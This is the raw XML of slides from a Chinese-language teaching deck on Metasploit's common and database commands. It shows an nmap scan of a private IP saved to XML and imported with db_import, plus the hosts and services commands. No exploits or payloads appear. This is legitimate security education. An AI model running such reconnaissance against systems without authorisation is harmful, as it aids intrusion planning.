                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit数据库相关命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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15" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750435" y="1799590"/>
            <a:ext cx="6325870" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.退出msfconsole命令行时，保存的这些扫描信息也不会被清空。使用“services -d”命令可以手动清空全部扫描信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.使用“hosts”命令可以查看已扫描目标主机的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.“db_import”命令用来导入数据库信息，“db_export”命令用来导出数据库信息。例如，使用“nmap 192.168.172.129 -oX 1.xml”命令扫描目标主机信息，并存储为“1.xml”，然后在msfconsole命令行中使用“db_import”命令将其导入，即“db_import 1.xml”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171825" y="2599055"/>
            <a:ext cx="5027930" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.Metasploit的基本命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.Metasploit数据库相关命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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14" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
